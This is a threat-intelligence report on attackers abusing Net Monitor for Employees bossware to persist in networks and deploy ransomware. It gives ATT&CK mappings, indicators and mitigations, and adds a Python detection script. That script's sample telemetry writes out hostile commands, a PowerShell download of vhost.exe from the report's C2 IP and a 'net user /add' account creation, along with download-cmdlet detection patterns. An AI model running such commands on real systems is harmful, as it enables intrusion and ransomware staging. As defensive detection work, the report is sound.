Full Report
**As if snooping on your workers wasn't bad enough.** Your supervisor may like using employee monitoring apps to keep tabs on you, but crims like the snooping software even more. Threat actors are now using legit bossware to blend into corporate networks and attempt ransomware deployment.…
Analysis Summary
# Tool/Technique: Net Monitor for Employees Professional (Abuse of Bossware)
## Overview
Threat actors are increasingly leveraging legitimate Remote Monitoring and Management (RMM) tools and "bossware" (employee monitoring software) to maintain persistence and move laterally within corporate networks. By using Net Monitor for Employees Professional, attackers can blend in with legitimate administrative traffic, execute remote commands, and deploy ransomware while evading traditional security detections that often whitelist signed, commercial binaries.
## Technical Details
- **Type:** Legit Tool / Living-off-the-Land (LotL)
- **Platform:** Windows
- **Capabilities:** Remote screen monitoring, remote shell access, command execution, file transfer, and process hiding.
- **First Seen:** Incidents reported in late January and early February 2026.
## MITRE ATT&CK Mapping
- **[TA0003 - Persistence]**
  - [T1543.003 - Create or Modify System Process: Windows Service]
- **[TA0005 - Defense Evasion]**
  - [T1036.005 - Masquerading: Match Legitimate Name or Location]
  - [T1562.001 - Impair Defenses: Disable or Modify Tools]
- **[TA0007 - Discovery]**
  - [T1018 - Remote System Discovery]
  - [T1087 - Account Discovery]
- **[TA0009 - Collection]**
  - [T1113 - Screen Capture]
- **[TA0011 - Command and Control]**
  - [T1219 - Remote Access Software]
## Functionality
### Core Capabilities
- **Stealth Monitoring:** Passive screen viewing to observe user activity and sensitive data.
- **Remote Shell:** Establishing terminal connections to execute `net` commands for account discovery and password resets.
- **File Distribution:** Pulling down additional payloads (e.g., SimpleHelp RMM or Ransomware) via PowerShell.
### Advanced Features
- **Customizable Identity:** The tool allows attackers to rename the service and binary. In observed cases, it was disguised as "Microsoft OneDrive" (`OneDriveSvc` / `OneDriver.exe`).
- **Keyword Monitoring:** Used in conjunction with RMM tools to trigger alerts when victims access cryptocurrency wallets or technical remote access tools (RDP, VNC, AnyDesk).
## Indicators of Compromise
- **File Hashes:**
  - *Note: Specific hashes for the legitimate binary vary by version; focus on behavioral indicators.*
- **File Names:**
  - `vhost.exe` (used for SimpleHelp delivery)
  - `OneDriver.exe` (masqueraded Net Monitor binary)
  - `svchost.exe` (renamed running binary in non-standard paths)
- **Registry Keys:**
  - Services registered as `OneDriveSvc` (when used maliciously).
- **Network Indicators:**
  - `160.191.182[.]41` (C2/payload delivery)
- **Behavioral Indicators:**
  - `net.exe` commands used for rapid account manipulation (identifying admins, resetting passwords).
  - PowerShell sessions downloading executables from external IP addresses.
  - Unexpected installation of monitoring agents on systems where no corporate policy for "bossware" exists.
## Associated Threat Actors
- **VoidCrypt (Affiliates):** Specifically linked through the attempted deployment of **Crazy ransomware**.
- **Unidentified Financially Motivated Actors:** Groups targeting cryptocurrency wallets alongside ransomware.
## Detection Methods
- **Signature-based detection:** Modern EDRs may flag the specific Net Monitor installer if not digitally signed by a trusted internal cert, though the binary itself is often "clean."
- **Behavioral detection:**
  - Monitor for `svchost.exe` executing from unusual directories or with unusual parent processes (e.g., a monitoring agent).
  - Alert on the creation of new administrative accounts via `net user /add` following the installation of RMM software.
  - Detect unauthorized PowerShell downloads (`Invoke-WebRequest`) from known-bad or suspicious IPs.
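The following is an added example, not part of the original report, showing how the behavioral detections listed above and the file, service and network indicators from the Indicators of Compromise section can be expressed as rules run over process-creation and service-installation telemetry. The event dictionaries, host name `ws01`, account name `backupadm`, and the internal address `10.0.0.5` are constructed sample data; the rule names, the `TRUSTED_SVCHOST_DIRS` / `USER_WRITABLE_HINTS` lists and the Sysmon/System event shapes are assumptions for illustration. The report's network indicator is kept defanged in the indicator set and refanged only when matching, which is the usual way to store published IoCs without accidentally creating live links.

```python
import ntpath
import re
from ipaddress import ip_address
from typing import Dict, Iterable, List, Tuple

# Indicators taken from the report above. The IP stays defanged as published
# and is refanged only at match time.
DEFANGED_IOC_IPS = {"160.191.182[.]41"}
IOC_FILE_NAMES = {"vhost.exe", "onedriver.exe"}
IOC_SERVICE_NAMES = {"onedrivesvc"}

# Assumed baseline: where a genuine svchost.exe lives and who normally starts it.
TRUSTED_SVCHOST_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
TRUSTED_SVCHOST_PARENT = "services.exe"
# Assumed list of directory fragments ordinary users can write to; a service
# binary living there is suspect.
USER_WRITABLE_HINTS = ("\\programdata\\", "\\users\\", "\\temp\\", "\\appdata\\")

DOWNLOAD_CMDLETS = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile", "start-bitstransfer")
URL_HOST_RE = re.compile(r"https?://([^/\s:\"']+)", re.IGNORECASE)

Finding = Tuple[str, str]  # (rule name, detail)


def refang(ioc: str) -> str:
    """Turn a defanged indicator such as 1.2.3[.]4 back into a matchable value."""
    return ioc.replace("[.]", ".")


IOC_IPS = {refang(i) for i in DEFANGED_IOC_IPS}


def _is_public_ip_literal(host: str) -> bool:
    """True only for a bare IP literal that is globally routable (not RFC 1918 etc.)."""
    try:
        return ip_address(host).is_global
    except ValueError:  # a hostname, not an IP literal
        return False


def check_process(ev: Dict[str, str]) -> List[Finding]:
    """Rules for a process-creation event (Sysmon EID 1 / Security 4688 style, assumed shape)."""
    findings: List[Finding] = []
    image, parent = ev["image"].lower(), ev.get("parent", "").lower()
    cmd = ev.get("cmdline", "")
    name = ntpath.basename(image)

    if name == "svchost.exe":  # renamed binary masquerading as svchost
        if ntpath.dirname(image) not in TRUSTED_SVCHOST_DIRS:
            findings.append(("svchost_nonstandard_path", image))
        elif ntpath.basename(parent) != TRUSTED_SVCHOST_PARENT:
            findings.append(("svchost_unusual_parent", parent))

    if name in IOC_FILE_NAMES:  # vhost.exe / OneDriver.exe from the IoC list
        findings.append(("ioc_file_name", image))

    if name in ("net.exe", "net1.exe"):  # account creation via net user ... /add
        low = cmd.lower()
        if re.search(r"\buser\b", low) and "/add" in low:
            findings.append(("net_user_add", cmd))

    if name in ("powershell.exe", "pwsh.exe"):  # download cradle to a raw IP
        low = cmd.lower()
        if any(c in low for c in DOWNLOAD_CMDLETS):
            for host in URL_HOST_RE.findall(cmd):
                if host in IOC_IPS:
                    findings.append(("ioc_c2_ip", host))
                elif _is_public_ip_literal(host):
                    findings.append(("powershell_download_external_ip", host))
    return findings


def check_service(ev: Dict[str, str]) -> List[Finding]:
    """Rules for a service-installation event (System EID 7045 style, assumed shape)."""
    findings: List[Finding] = []
    name, image = ev["name"].lower(), ev["image"].lower()
    if name in IOC_SERVICE_NAMES or ntpath.basename(image) in IOC_FILE_NAMES:
        findings.append(("ioc_service_masquerade", f"{ev['name']} -> {ev['image']}"))
    if any(h in image for h in USER_WRITABLE_HINTS):
        findings.append(("service_from_user_writable_path", image))
    return findings


def detect(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run every rule over a stream of events and return flat findings."""
    out = []
    for ev in events:
        checker = check_service if ev["type"] == "service" else check_process
        for rule, detail in checker(ev):
            out.append({"host": ev.get("host", "?"), "rule": rule, "detail": detail})
    return out


# Constructed sample telemetry (not from the report): a benign baseline plus the
# behaviours the report describes. The password argument is redacted on purpose.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"type": "service", "host": "ws01", "name": "OneDriveSvc",
     "image": r"C:\ProgramData\OneDrive\OneDriver.exe"},
    {"type": "process", "host": "ws01", "image": r"C:\Users\Public\svchost.exe",
     "parent": r"C:\ProgramData\OneDrive\OneDriver.exe", "cmdline": "svchost.exe"},
    {"type": "process", "host": "ws01", "image": r"C:\Windows\System32\net.exe",
     "parent": r"C:\ProgramData\OneDrive\OneDriver.exe", "cmdline": "net user backupadm <redacted> /add"},
    {"type": "process", "host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\ProgramData\OneDrive\OneDriver.exe",
     "cmdline": "powershell -c Invoke-WebRequest http://160.191.182.41/vhost.exe -OutFile C:\\Users\\Public\\vhost.exe"},
    {"type": "process", "host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -c Invoke-WebRequest http://10.0.0.5/inventory.ps1 -OutFile C:\\Temp\\inventory.ps1"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['rule']}: {f['detail']}")
```

Running the block prints five findings for the sample: the masqueraded service (matched both by name and by its user-writable path), the `svchost.exe` copy outside `System32`, the `net user /add`, and the download from the report's C2 address; the genuine `svchost.exe` and the download from an internal address produce nothing, which is the point of the `is_global` check in the PowerShell rule. In a real pipeline the `TRUSTED_SVCHOST_DIRS` and parent check should be tuned to the environment, and the `net user` rule is most useful when correlated with a recent RMM or monitoring-agent install on the same host, as the report suggests.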
## Mitigation Strategies
- **Identity Security:** Enforce Multi-Factor Authentication (MFA) on all VPN and remote access gateways to prevent initial entry via compromised credentials.
- **Software Restriction Policies:** Implement AppLocker or Windows Defender Application Control (WDAC) to prevent the execution of unauthorized RMM or monitoring tools.
- **Audit & Inventory:** Regularly audit installed software to check for "Shadow IT" or unauthorized monitoring tools like Net Monitor or SimpleHelp.
- **Principle of Least Privilege:** Limit the ability of standard users to install services or modify system-level binaries.
## Related Tools/Techniques
- **SimpleHelp:** A legitimate RMM tool frequently abused for persistence.
- **AnyDesk/TeamViewer:** Often used in similar "living-off-the-land" remote access attacks.
- **VoidCrypt/Crazy Ransomware:** The final payload delivered after the environment was prepared using the monitoring tools.